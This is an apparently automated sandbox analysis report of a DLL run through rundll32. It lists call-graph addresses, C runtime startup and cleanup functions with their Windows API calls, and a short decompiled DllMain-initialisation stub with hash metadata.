7ffa535ed718 __vcrt_uninitialize_ptd 5 API calls 7589->7590 7591 7ffa535edcb3 7590->7591 7591->7587 7594 7ffa535e7f05 7593->7594 7595 7ffa535e7f0f 7593->7595 7594->7595 7598 7ffa535e7f2a 7594->7598 7596 7ffa535e8380 _get_daylight 15 API calls 7595->7596 7601 7ffa535e7f16 7596->7601 7597 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 7599 7ffa535e7f22 7597->7599 7598->7599 7600 7ffa535e8380 _get_daylight 15 API calls 7598->7600 7599->7240 7600->7601 7601->7597 7606 7ffa535e7633 7602->7606 7607 7ffa535e767d 7602->7607 7603 7ffa535e76a6 7605 7ffa535e7e58 __vcrt_freeptd 15 API calls 7603->7605 7604 7ffa535e7e58 __vcrt_freeptd 15 API calls 7604->7607 7605->7606 7606->7249 7607->7603 7607->7604 8457 7ffa535e4fc8 8460 7ffa535e4feb 8457->8460 8458 7ffa535e8380 _get_daylight 15 API calls 8459 7ffa535e4ff0 8458->8459 8461 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8459->8461 8460->8458 8462 7ffa535e4ffb 8460->8462 8461->8462 8862 7ffa535e4c48 8863 7ffa535e4bd0 8862->8863 8864 7ffa535e4ae8 36 API calls 8863->8864 8865 7ffa535e4bf4 8864->8865 8463 7ffa535e85c4 8464 7ffa535e85d0 8463->8464 8466 7ffa535e85f7 8464->8466 8467 7ffa535efe3c 8464->8467 8468 7ffa535efe41 8467->8468 8472 7ffa535efe7c 8467->8472 8469 7ffa535efe74 8468->8469 8470 7ffa535efe62 DeleteCriticalSection 8468->8470 8471 7ffa535e7e58 __vcrt_freeptd 15 API calls 8469->8471 8470->8469 8470->8470 8471->8472 8472->8464 8473 7ffa535f20c5 8474 7ffa535f2123 8473->8474 8475 7ffa535f21a3 8474->8475 8476 7ffa535f0b44 _handle_error 24 API calls 8474->8476 8476->8475 8866 7ffa535e7d44 8867 7ffa535e7d5d 8866->8867 8871 7ffa535e7d75 8866->8871 8869 7ffa535e7e58 __vcrt_freeptd 15 API calls 8867->8869 8867->8871 8868 7ffa535e7e58 __vcrt_freeptd 15 API calls 8870 7ffa535e7d88 8868->8870 8869->8871 8872 7ffa535e7e58 __vcrt_freeptd 15 API calls 8870->8872 8871->8868 8873 7ffa535e7d9d 8872->8873 8874 7ffa535e7e58 __vcrt_freeptd 15 API calls 8873->8874 8875 7ffa535e7db0 8874->8875 8876 7ffa535e7e58 __vcrt_freeptd 15 API calls 8875->8876 8877 7ffa535e7dc3 8876->8877 7655 7ffa535e30c0 7656 7ffa535e30e6 7655->7656 7657 7ffa535e30fd dllmain_raw 7656->7657 7659 7ffa535e30ee 7656->7659 7662 7ffa535e311d 7656->7662 7658 7ffa535e3110 7657->7658 7657->7659 7668 7ffa535e2ec0 7658->7668 7661 7ffa535e316a 7661->7659 7663 7ffa535e2ec0 62 API calls 7661->7663 7662->7659 7662->7661 7666 7ffa535e2ec0 62 API calls 7662->7666 7664 7ffa535e3180 7663->7664 7664->7659 7665 7ffa535e318a dllmain_raw 7664->7665 7665->7659 7667 7ffa535e315d dllmain_raw 7666->7667 7667->7661 7669 7ffa535e2ec8 7668->7669 7676 7ffa535e2f01 __scrt_acquire_startup_lock 7668->7676 7670 7ffa535e2ef5 7669->7670 7671 7ffa535e2ecd 7669->7671 7700 7ffa535e33bc 7670->7700 7673 7ffa535e2ee8 __scrt_dllmain_crt_thread_attach 7671->7673 7674 7ffa535e2ed2 7671->7674 7672 7ffa535e305a 7672->7662 7675 7ffa535e2ee6 7673->7675 7678 7ffa535e2ed7 7674->7678 7715 7ffa535e32fc 7674->7715 7675->7662 7676->7672 7680 7ffa535e3085 7676->7680 7681 7ffa535e372c __scrt_fastfail 6 API calls 7676->7681 7678->7662 7727 7ffa535e3378 7680->7727 7681->7680 7683 7ffa535e308a 7732 7ffa535e33a8 7683->7732 7684 7ffa535e2f32 __scrt_acquire_startup_lock 7686 7ffa535e2f5e 7684->7686 7696 7ffa535e2f36 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 7684->7696 7720 7ffa535e372c 7684->7720 7708 7ffa535e32bc 7686->7708 7688 7ffa535e3095 __scrt_release_startup_lock 7737 7ffa535e3594 7688->7737 7691 7ffa535e2f6d _RTC_Initialize 7691->7696 7711 7ffa535e3610 7691->7711 7695 7ffa535e2f87 7697 7ffa535e3610 35 API calls 7695->7697 7696->7662 7698 7ffa535e2f93 __scrt_initialize_default_local_stdio_options 7697->7698 7698->7696 7699 7ffa535e2faf __scrt_dllmain_after_initialize_c 7698->7699 7699->7696 7701 7ffa535e33de __isa_available_init 7700->7701 7741 7ffa535e42ec 7701->7741 7707 7ffa535e33e7 7707->7684 7828 7ffa535e3408 7708->7828 7710 7ffa535e32c7 7710->7691 7833 7ffa535e35c0 7711->7833 7713 7ffa535e2f82 7714 7ffa535e36d4 InitializeSListHead 7713->7714 7848 7ffa535e7dfc 7715->7848 7721 7ffa535e374d __scrt_fastfail 7720->7721 7722 7ffa535e376d RtlCaptureContext RtlLookupFunctionEntry 7721->7722 7723 7ffa535e3796 RtlVirtualUnwind 7722->7723 7724 7ffa535e37d2 __scrt_fastfail 7722->7724 7723->7724 7725 7ffa535e3804 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7724->7725 7726 7ffa535e3856 7725->7726 7726->7686 7729 7ffa535e3381 __scrt_acquire_startup_lock 7727->7729 7728 7ffa535e3395 7728->7683 7729->7728 7919 7ffa535e784c 7729->7919 7927 7ffa535e7e20 7732->7927 7735 7ffa535e4590 __vcrt_uninitialize_ptd 6 API calls 7736 7ffa535e4371 7735->7736 7736->7688 7738 7ffa535e35a5 __scrt_uninitialize_crt 7737->7738 7739 7ffa535e35b7 7738->7739 7740 7ffa535e4348 __vcrt_uninitialize 8 API calls 7738->7740 7739->7672 7740->7739 7742 7ffa535e42f5 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 7741->7742 7761 7ffa535e45b4 7742->7761 7745 7ffa535e33e3 7745->7707 7749 7ffa535e7dd4 7745->7749 7750 7ffa535ef3fc 7749->7750 7751 7ffa535e33f0 7750->7751 7812 7ffa535e8588 7750->7812 7751->7707 7753 7ffa535e4348 7751->7753 7754 7ffa535e4361 7753->7754 7755 7ffa535e4350 7753->7755 7754->7707 7756 7ffa535e4590 __vcrt_uninitialize_ptd 6 API calls 7755->7756 7757 7ffa535e4355 7756->7757 7758 7ffa535e45fc __vcrt_uninitialize_locks DeleteCriticalSection 7757->7758 7759 7ffa535e435a 7758->7759 7824 7ffa535e4a24 7759->7824 7762 7ffa535e45bc 7761->7762 7764 7ffa535e45ed 7762->7764 7765 7ffa535e42ff 7762->7765 7778 7ffa535e4960 7762->7778 7766 7ffa535e45fc __vcrt_uninitialize_locks DeleteCriticalSection 7764->7766 7765->7745 7767 7ffa535e4550 7765->7767 7766->7765 7793 7ffa535e47fc 7767->7793 7769 7ffa535e4560 7770 7ffa535e430c 7769->7770 7798 7ffa535e48f8 7769->7798 7770->7745 7774 7ffa535e45fc 7770->7774 7772 7ffa535e457d 7772->7770 7803 7ffa535e4590 7772->7803 7775 7ffa535e4627 7774->7775 7776 7ffa535e462b 7775->7776 7777 7ffa535e460a DeleteCriticalSection 7775->7777 7776->7745 7777->7775 7783 7ffa535e4634 7778->7783 7781 7ffa535e49b7 InitializeCriticalSectionAndSpinCount 7782 7ffa535e49a3 7781->7782 7782->7762 7784 7ffa535e469a 7783->7784 7788 7ffa535e4695 7783->7788 7784->7781 7784->7782 7785 7ffa535e46cd LoadLibraryExW 7787 7ffa535e46f3 GetLastError 7785->7787 7785->7788 7786 7ffa535e4771 GetProcAddress 7786->7784 7790 7ffa535e4789 7786->7790 7787->7788 7791 7ffa535e46fe LoadLibraryExW 7787->7791 7788->7784 7788->7785 7789 7ffa535e4762 7788->7789 7792 7ffa535e4740 FreeLibrary 7788->7792 7789->7784 7789->7786 7790->7784 7791->7788 7792->7788 7794 7ffa535e4634 try_get_function 5 API calls 7793->7794 7795 7ffa535e4828 7794->7795 7796 7ffa535e483f TlsAlloc 7795->7796 7797 7ffa535e4830 7795->7797 7796->7797 7797->7769 7799 7ffa535e4634 try_get_function 5 API calls 7798->7799 7800 7ffa535e492b 7799->7800 7801 7ffa535e4944 TlsSetValue 7800->7801 7802 7ffa535e4933 7800->7802 7801->7802 7802->7772 7804 7ffa535e459f 7803->7804 7805 7ffa535e45a4 7803->7805 7807 7ffa535e4850 7804->7807 7805->7770 7808 7ffa535e4634 try_get_function 5 API calls 7807->7808 7809 7ffa535e487b 7808->7809 7810 7ffa535e4891 TlsFree 7809->7810 7811 7ffa535e4883 7809->7811 7810->7811 7811->7805 7823 7ffa535ed6a8 EnterCriticalSection 7812->7823 7814 7ffa535e8598 7815 7ffa535efe8c 33 API calls 7814->7815 7816 7ffa535e85a1 7815->7816 7817 7ffa535e83a0 35 API calls 7816->7817 7822 7ffa535e85af 7816->7822 7819 7ffa535e85aa 7817->7819 7818 7ffa535ed6fc _isindst LeaveCriticalSection 7820 7ffa535e85bb 7818->7820 7821 7ffa535e848c GetStdHandle GetFileType 7819->7821 7820->7750 7821->7822 7822->7818 7825 7ffa535e4a5c 7824->7825 7826 7ffa535e4a28 7824->7826 7825->7754 7826->7825 7827 7ffa535e4a42 FreeLibrary 7826->7827 7827->7826 7829 7ffa535e34c6 7828->7829 7830 7ffa535e3420 __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 7828->7830 7831 7ffa535e372c __scrt_fastfail 6 API calls 7829->7831 7830->7710 7832 7ffa535e34d0 7831->7832 7834 7ffa535e35e5 _onexit 7833->7834 7835 7ffa535e35ef 7833->7835 7834->7713 7837 7ffa535e7c54 7835->7837 7840 7ffa535e7810 7837->7840 7847 7ffa535ed6a8 EnterCriticalSection 7840->7847 7854 7ffa535e89ec 7848->7854 7851 7ffa535e4334 7906 7ffa535e4448 7851->7906 7855 7ffa535e3305 7854->7855 7856 7ffa535e89fd 7854->7856 7855->7851 7857 7ffa535eda58 _get_daylight 6 API calls 7856->7857 7858 7ffa535e8a02 7857->7858 7858->7855 7859 7ffa535edab0 _get_daylight 6 API calls 7858->7859 7860 7ffa535e8a17 7859->7860 7864 7ffa535e888c 7860->7864 7865 7ffa535e88ce 7864->7865 7866 7ffa535e88d6 7864->7866 7868 7ffa535e7e58 __vcrt_freeptd 15 API calls 7865->7868 7867 7ffa535e7e58 __vcrt_freeptd 15 API calls 7866->7867 7869 7ffa535e88e3 7867->7869 7868->7866 7870 7ffa535e7e58 __vcrt_freeptd 15 API calls 7869->7870 7871 7ffa535e88f0 7870->7871 7872 7ffa535e7e58 __vcrt_freeptd 15 API calls 7871->7872 7873 7ffa535e88fd 7872->7873 7874 7ffa535e7e58 __vcrt_freeptd 15 API calls 7873->7874 7875 7ffa535e890a 7874->7875 7876 7ffa535e7e58 __vcrt_freeptd 15 API calls 7875->7876 7877 7ffa535e8917 7876->7877 7878 7ffa535e7e58 __vcrt_freeptd 15 API calls 7877->7878 7879 7ffa535e8924 7878->7879 7880 7ffa535e7e58 __vcrt_freeptd 15 API calls 7879->7880 7881 7ffa535e8931 7880->7881 7882 7ffa535e7e58 __vcrt_freeptd 15 API calls 7881->7882 7883 7ffa535e8941 7882->7883 7884 7ffa535e7e58 __vcrt_freeptd 15 API calls 7883->7884 7885 7ffa535e8951 7884->7885 7890 7ffa535e8674 7885->7890 7904 7ffa535ed6a8 EnterCriticalSection 7890->7904 7907 7ffa535e330a 7906->7907 7908 7ffa535e445c 7906->7908 7907->7675 7909 7ffa535e4466 7908->7909 7914 7ffa535e48a4 7908->7914 7911 7ffa535e48f8 __vcrt_FlsSetValue 6 API calls 7909->7911 7912 7ffa535e4476 7911->7912 7912->7907 7913 7ffa535e7e58 __vcrt_freeptd 15 API calls 7912->7913 7913->7907 7915 7ffa535e4634 try_get_function 5 API calls 7914->7915 7916 7ffa535e48cf 7915->7916 7917 7ffa535e48e5 TlsGetValue 7916->7917 7918 7ffa535e48d7 7916->7918 7917->7918 7918->7909 7926 7ffa535ed6a8 EnterCriticalSection 7919->7926 7930 7ffa535e8ba0 7927->7930 7931 7ffa535e8baf 7930->7931 7932 7ffa535e33b3 7930->7932 7934 7ffa535eda00 7931->7934 7932->7735 7935 7ffa535ed718 __vcrt_uninitialize_ptd 5 API calls 7934->7935 7936 7ffa535eda2b 7935->7936 7937 7ffa535eda42 TlsFree 7936->7937 7938 7ffa535eda33 7936->7938 7937->7938 7938->7932 8878 7ffa535fb857 8879 7ffa535e33a8 12 API calls 8878->8879 8880 7ffa535fb865 8879->8880 8477 7ffa535e7cd8 8480 7ffa535e77d0 8477->8480 8487 7ffa535e7790 8480->8487 8485 7ffa535e7678 15 API calls 8486 7ffa535e77f8 8485->8486 8488 7ffa535e77a5 8487->8488 8489 7ffa535e77a0 8487->8489 8491 7ffa535e77ac 8488->8491 8490 7ffa535e7678 15 API calls 8489->8490 8490->8488 8492 7ffa535e77c1 8491->8492 8493 7ffa535e77bc 8491->8493 8492->8485 8494 7ffa535e7678 15 API calls 8493->8494 8494->8492 8881 7ffa535e4f58 8882 7ffa535e4f69 8881->8882 8885 7ffa535e4ea8 8882->8885 8886 7ffa535e4ec9 8885->8886 8887 7ffa535e8380 _get_daylight 15 API calls 8886->8887 8890 7ffa535e4f22 8886->8890 8888 7ffa535e4f16 8887->8888 8889 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8888->8889 8889->8890 8891 7ffa535e5e58 8892 7ffa535e5e82 8891->8892 8893 7ffa535e5e88 8892->8893 8894 7ffa535e5ea4 8892->8894 8895 7ffa535e5ebf 8892->8895 8907 7ffa535e6018 8894->8907 8897 7ffa535e5f3e 8895->8897 8898 7ffa535e5ece 8895->8898 8900 7ffa535e6068 32 API calls 8897->8900 8911 7ffa535e6068 8898->8911 8902 7ffa535e5f79 8900->8902 8904 7ffa535e6068 32 API calls 8902->8904 8905 7ffa535e5fad 8904->8905 8926 7ffa535ed26c 8905->8926 8908 7ffa535e603f _ctrlfp 8907->8908 8930 7ffa535eb8b4 8908->8930 8912 7ffa535e6074 8911->8912 8913 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8912->8913 8914 7ffa535e5ef8 8912->8914 8913->8914 8915 7ffa535e5cd0 8914->8915 8916 7ffa535e5d09 8915->8916 8917 7ffa535e5d63 8916->8917 8918 7ffa535e5d23 8916->8918 8920 7ffa535e6068 32 API calls 8917->8920 8919 7ffa535e6068 32 API calls 8918->8919 8921 7ffa535e5d4d 8919->8921 8922 7ffa535e5d9f 8920->8922 8921->8893 8923 7ffa535e6068 32 API calls 8922->8923 8924 7ffa535e5de4 8923->8924 8925 7ffa535ed26c 24 API calls 8924->8925 8925->8921 8927 7ffa535ed296 8926->8927 8928 7ffa535f0b44 _handle_error 24 API calls 8927->8928 8929 7ffa535ed2a5 8927->8929 8928->8929 8929->8893 8931 7ffa535eb8fc 8930->8931 8932 7ffa535ebd48 _raise_excf RaiseException 8931->8932 8934 7ffa535eb92d _errcode _handle_error 8931->8934 8932->8934 8933 7ffa535eb968 8935 7ffa535ec07c _set_errno_from_matherr 15 API calls 8933->8935 8934->8933 8936 7ffa535eb947 8934->8936 8938 7ffa535eb966 _ctrlfp 8935->8938 8937 7ffa535ec0ac 15 API calls 8936->8937 8937->8938 8939 7ffa535f51e0 _FXp_mulh 8 API calls 8938->8939 8940 7ffa535e6056 8939->8940 8940->8893 8495 7ffa535ef3d4 GetProcessHeap 8941 7ffa535f5054 8942 7ffa535f5069 CloseHandle 8941->8942 8943 7ffa535f506f 8941->8943 8942->8943 8496 7ffa535e58d2 8497 7ffa535e58e9 _FXp_mulh 8496->8497 8499 7ffa535e5916 8497->8499 8501 7ffa535e592c 8497->8501 8502 7ffa535e90cc 8497->8502 8498 7ffa535e90cc _FXp_mulh 15 API calls 8498->8501 8499->8498 8499->8501 8503 7ffa535e90e7 _FXp_mulh 8502->8503 8504 7ffa535e9143 8503->8504 8505 7ffa535e9150 8503->8505 8506 7ffa535e8380 _get_daylight 15 API calls 8504->8506 8507 7ffa535e9148 8505->8507 8508 7ffa535e8380 _get_daylight 15 API calls 8505->8508 8506->8507 8507->8499 8508->8507 8944 7ffa535ec255 8945 7ffa535ec4b0 8944->8945 8946 7ffa535ec27f 8944->8946 8947 7ffa535ec5b9 __remainder_piby2_cw_forAsm 8946->8947 8948 7ffa535ec5d0 8946->8948 8950 7ffa535ec291 8946->8950 8947->8948 8952 7ffa535f20f8 8948->8952 8953 7ffa535f2120 8952->8953 8954 7ffa535ec5da 8953->8954 8955 7ffa535f0b44 _handle_error 24 API calls 8953->8955 8955->8954 8509 7ffa535e32d4 8516 7ffa535e4320 8509->8516 8512 7ffa535e32e1 8515 7ffa535e4334 22 API calls 8515->8512 8522 7ffa535e4498 8516->8522 8519 7ffa535e7de8 8520 7ffa535e8ac4 _get_daylight 15 API calls 8519->8520 8521 7ffa535e32ea 8520->8521 8521->8512 8521->8515 8523 7ffa535e44b7 GetLastError 8522->8523 8524 7ffa535e32dd 8522->8524 8525 7ffa535e48a4 __vcrt_FlsGetValue 6 API calls 8523->8525 8524->8512 8524->8519 8526 7ffa535e44ca 8525->8526 8527 7ffa535e4535 SetLastError 8526->8527 8528 7ffa535e44da 8526->8528 8529 7ffa535e48f8 __vcrt_FlsSetValue 6 API calls 8526->8529 8527->8524 8528->8527 8530 7ffa535e44ea 8529->8530 8530->8527 8531 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8530->8531 8532 7ffa535e44fb 8531->8532 8533 7ffa535e4511 8532->8533 8535 7ffa535e48f8 __vcrt_FlsSetValue 6 API calls 8532->8535 8534 7ffa535e48f8 __vcrt_FlsSetValue 6 API calls 8533->8534 8536 7ffa535e4522 8533->8536 8534->8536 8535->8533 8537 7ffa535e7e58 __vcrt_freeptd 15 API calls 8536->8537 8537->8527 8956 7ffa535eef50 8957 7ffa535eef74 8956->8957 8960 7ffa535eef88 strchr 8956->8960 8958 7ffa535e8380 _get_daylight 15 API calls 8957->8958 8959 7ffa535eef79 8958->8959 8961 7ffa535eeffb 8960->8961 8963 7ffa535eefc7 8960->8963 9002 7ffa535ef240 8960->9002 8962 7ffa535e8380 _get_daylight 15 API calls 8961->8962 8994 7ffa535ef000 8962->8994 8965 7ffa535ef034 8963->8965 8967 7ffa535eefed 8963->8967 8970 7ffa535ef08a 8963->8970 8969 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8965->8969 8965->8994 8966 7ffa535ef0d8 8972 7ffa535ef147 8966->8972 8974 7ffa535ef0f5 8966->8974 8967->8961 8967->8970 8971 7ffa535ef046 8969->8971 8970->8966 8970->8994 9020 7ffa535f2db0 8970->9020 8973 7ffa535e7e58 __vcrt_freeptd 15 API calls 8971->8973 8979 7ffa535ef334 _onexit 35 API calls 8972->8979 8972->8994 8977 7ffa535ef054 8973->8977 8976 7ffa535e7e58 __vcrt_freeptd 15 API calls 8974->8976 8975 7ffa535e7e58 __vcrt_freeptd 15 API calls 8975->8959 8978 7ffa535ef0fe 8976->8978 8977->8970 8980 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8977->8980 8977->8994 8983 7ffa535ef334 _onexit 35 API calls 8978->8983 8987 7ffa535ef103 8978->8987 8981 7ffa535ef182 8979->8981 8984 7ffa535ef07c 8980->8984 8982 7ffa535e7e58 __vcrt_freeptd 15 API calls 8981->8982 8982->8987 8985 7ffa535ef12f 8983->8985 8986 7ffa535e7e58 __vcrt_freeptd 15 API calls 8984->8986 8988 7ffa535e7e58 __vcrt_freeptd 15 API calls 8985->8988 8986->8970 8987->8987 8989 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8987->8989 8987->8994 8988->8987 8990 7ffa535ef1cc 8989->8990 8991 7ffa535ef213 8990->8991 8993 7ffa535e7ef8 32 API calls 8990->8993 8992 7ffa535e7e58 __vcrt_freeptd 15 API calls 8991->8992 8992->8994 8995 7ffa535ef1e3 8993->8995 8994->8975 8996 7ffa535ef228 8995->8996 8997 7ffa535ef1e7 SetEnvironmentVariableA 8995->8997 8998 7ffa535e8280 _isindst 17 API calls 8996->8998 8997->8991 8999 7ffa535ef20e 8997->8999 9000 7ffa535ef23c 8998->9000 9001 7ffa535e8380 _get_daylight 15 API calls 8999->9001 9001->8991 9003 7ffa535ef25d 9002->9003 9004 7ffa535ef264 9002->9004 9003->8963 9004->9004 9005 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 9004->9005 9006 7ffa535ef288 9005->9006 9007 7ffa535ef308 9006->9007 9018 7ffa535ef290 9006->9018 9009 7ffa535e7f58 abort 36 API calls 9007->9009 9008 7ffa535ef2e8 9010 7ffa535e7e58 __vcrt_freeptd 15 API calls 9008->9010 9011 7ffa535ef30d 9009->9011 9010->9003 9012 7ffa535e8280 _isindst 17 API calls 9011->9012 9014 7ffa535ef323 9012->9014 9013 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 9013->9018 9016 7ffa535e7f58 abort 36 API calls 9014->9016 9015 7ffa535e7e58 __vcrt_freeptd 15 API calls 9015->9018 9017 7ffa535ef329 9016->9017 9018->9008 9018->9011 9018->9013 9018->9014 9018->9015 9019 7ffa535e7ef8 32 API calls 9018->9019 9019->9018 9021 7ffa535f2dbe 9020->9021 9027 7ffa535f3680 9020->9027 9024 7ffa535e4ae8 36 API calls 9021->9024 9022 7ffa535f36bb 9028 7ffa535f3726 9022->9028 9030 7ffa535e4ae8 36 API calls 9022->9030 9023 7ffa535f3693 9025 7ffa535e8380 _get_daylight 15 API calls 9023->9025 9026 7ffa535f2df1 9024->9026 9029 7ffa535f3698 9025->9029 9032 7ffa535f2e07 9026->9032 9034 7ffa535f2e1e 9026->9034 9049 7ffa535f2df6 9026->9049 9027->9022 9027->9023 9028->8970 9031 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 9029->9031 9040 7ffa535f3702 9030->9040 9033 7ffa535f36a3 9031->9033 9035 7ffa535e8380 _get_daylight 15 API calls 9032->9035 9033->8970 9038 7ffa535f2e28 9034->9038 9039 7ffa535f2e3a 9034->9039 9037 7ffa535f2e0c 9035->9037 9036 7ffa535f3716 9041 7ffa535e8380 _get_daylight 15 API calls 9036->9041 9044 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 9037->9044 9045 7ffa535e8380 _get_daylight 15 API calls 9038->9045 9042 7ffa535f2e62 9039->9042 9043 7ffa535f2e4b 9039->9043 9040->9036 9056 7ffa535f3728 9040->9056 9046 7ffa535f371b 9041->9046 9068 7ffa535f3b40 9042->9068 9057 7ffa535f36d0 9043->9057 9044->9049 9050 7ffa535f2e2d 9045->9050 9051 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 9046->9051 9049->8970 9053 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 9050->9053 9051->9028 9053->9049 9054 7ffa535e8380 _get_daylight 15 API calls 9054->9049 9055 7ffa535ef958 44 API calls 9055->9056 9056->9028 9056->9055 9058 7ffa535f36f6 9057->9058 9059 7ffa535f3726 9057->9059 9060 7ffa535e4ae8 36 API calls 9058->9060 9059->9049 9061 7ffa535f3702 9060->9061 9062 7ffa535f3716 9061->9062 9067 7ffa535f3728 9061->9067 9063 7ffa535e8380 _get_daylight 15 API calls 9062->9063 9064 7ffa535f371b 9063->9064 9065 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 9064->9065 9065->9059 9066 7ffa535ef958 44 API calls 9066->9067 9067->9059 9067->9066 9069 7ffa535e4ae8 36 API calls 9068->9069 9070 7ffa535f3b65 9069->9070 9073 7ffa535f37ac 9070->9073 9075 7ffa535f37f6 9073->9075 9074 7ffa535f51e0 _FXp_mulh 8 API calls 9076 7ffa535f2e89 9074->9076 9077 7ffa535f38ef MultiByteToWideChar 9075->9077 9079 7ffa535f387b GetCPInfo 9075->9079 9088 7ffa535f3824 9075->9088 9076->9049 9076->9054 9078 7ffa535f3918 9077->9078 9077->9088 9081 7ffa535e7e98 _onexit 16 API calls 9078->9081 9083 7ffa535f3950 9078->9083 9080 7ffa535f388c 9079->9080 9079->9088 9080->9077 9080->9088 9081->9083 9082 7ffa535f39b4 MultiByteToWideChar 9084 7ffa535f39da MultiByteToWideChar 9082->9084 9086 7ffa535f3b05 9082->9086 9083->9082 9083->9086 9085 7ffa535f3a04 9084->9085 9084->9086 9089 7ffa535e7e98 _onexit 16 API calls 9085->9089 9093 7ffa535f3a32 9085->9093 9087 7ffa535e7e58 __vcrt_freeptd 15 API calls 9086->9087 9086->9088 9087->9088 9088->9074 9089->9093 9090 7ffa535f3a99 MultiByteToWideChar 9091 7ffa535f3abb 9090->9091 9094 7ffa535f3ae9 9090->9094 9096 7ffa535ed8b8 9091->9096 9093->9090 9093->9094 9094->9086 9095 7ffa535e7e58 __vcrt_freeptd 15 API calls 9094->9095 9095->9086 9097 7ffa535ed718 __vcrt_uninitialize_ptd 5 API calls 9096->9097 9098 7ffa535ed8fb 9097->9098 9099 7ffa535ed903 9098->9099 9100 7ffa535edc80 5 API calls 9098->9100 9099->9094 9101 7ffa535ed964 CompareStringW 9100->9101 9101->9099 9102 7ffa535e594e 9104 7ffa535e5960 9102->9104 9103 7ffa535e5995 9104->9103 9105 7ffa535e90cc _FXp_mulh 15 API calls 9104->9105 9105->9103

                Executed Functions

                Function 00007FFA535E2EC0 Relevance: 18.1, APIs: 12, Instructions: 133COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 7ffa535e2ec0-7ffa535e2ec6 1 7ffa535e2ec8-7ffa535e2ecb 0->1 2 7ffa535e2f01-7ffa535e3058 0->2 4 7ffa535e2ef5-7ffa535e2f34 call 7ffa535e33bc 1->4 5 7ffa535e2ecd-7ffa535e2ed0 1->5 6 7ffa535e305e-7ffa535e3079 call 7ffa535e324c 2->6 7 7ffa535e305a-7ffa535e305c 2->7 23 7ffa535e2f36-7ffa535e2f38 4->23 24 7ffa535e2f3d-7ffa535e2f52 call 7ffa535e324c 4->24 9 7ffa535e2ee8 __scrt_dllmain_crt_thread_attach 5->9 10 7ffa535e2ed2-7ffa535e2ed5 5->10 21 7ffa535e3085-7ffa535e30ac call 7ffa535e3378 call 7ffa535e33a8 call 7ffa535e3570 call 7ffa535e3594 6->21 22 7ffa535e307b-7ffa535e3080 call 7ffa535e372c 6->22 12 7ffa535e30ae-7ffa535e30bd 7->12 11 7ffa535e2eed-7ffa535e2ef4 9->11 15 7ffa535e2ed7-7ffa535e2ee0 10->15 16 7ffa535e2ee1-7ffa535e2ee6 call 7ffa535e32fc 10->16 16->11 21->12 22->21 27 7ffa535e3025-7ffa535e303a 23->27 32 7ffa535e2f54-7ffa535e2f59 call 7ffa535e372c 24->32 33 7ffa535e2f5e-7ffa535e2f6f call 7ffa535e32bc 24->33 32->33 39 7ffa535e2fd8-7ffa535e2fe2 call 7ffa535e3570 33->39 40 7ffa535e2f71-7ffa535e2fad call 7ffa535e3874 call 7ffa535e3610 call 7ffa535e36d4 call 7ffa535e3610 call 7ffa535e3700 call 7ffa535e6ce4 33->40 39->23 49 7ffa535e2fe8-7ffa535e2ff4 call 7ffa535e371c 39->49 40->39 68 7ffa535e2faf-7ffa535e2fb6 __scrt_dllmain_after_initialize_c 40->68 55 7ffa535e2ff6-7ffa535e3000 call 7ffa535e34d4 49->55 56 7ffa535e301a-7ffa535e3020 49->56 55->56 62 7ffa535e3002-7ffa535e3015 call 7ffa535e390c 55->62 56->27 62->56 68->39 69 7ffa535e2fb8-7ffa535e2fd5 call 7ffa535e6c6c 68->69 69->39
                C-Code - Quality: 100%
                			E00007FFA7FFA535E2EC0(void* __eax, void* __rdx) {
				void* _t3;
				void* _t6;

				_t6 = _t3;
				if (_t6 == 0) goto 0x535e2f01;
				if (_t6 == 0) goto 0x535e2ef5;
				if (_t6 == 0) goto 0x535e2ee8;
				if (_t3 == 1) goto 0x535e2ee1;
				return 1;
			}





                0x7ffa535e2ec4
                0x7ffa535e2ec6
                0x7ffa535e2ecb
                0x7ffa535e2ed0
                0x7ffa535e2ed5
                0x7ffa535e2ee0

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                • String ID:
                • API String ID: 3885183344-0
                • Opcode ID: 3b09c40dbe3440787c7c5c53ee7d12fadfcf4d07a70367e36c859bbc1eee5872
                • Instruction ID: bbf71c4312eac89eec456935d9a7b20769ad314045f6b1ccab871f67e16a33f4
                • Opcode Fuzzy Hash: 3b09c40dbe3440787c7c5c53ee7d12fadfcf4d07a70367e36c859bbc1eee5872
                • Instruction Fuzzy Hash: FD519361D3CF034DFA54ABA194422B9225BAFD7380F8CE0B5E68D67797CE2DE445A700
                Uniqueness

                Uniqueness Score: -1.00%

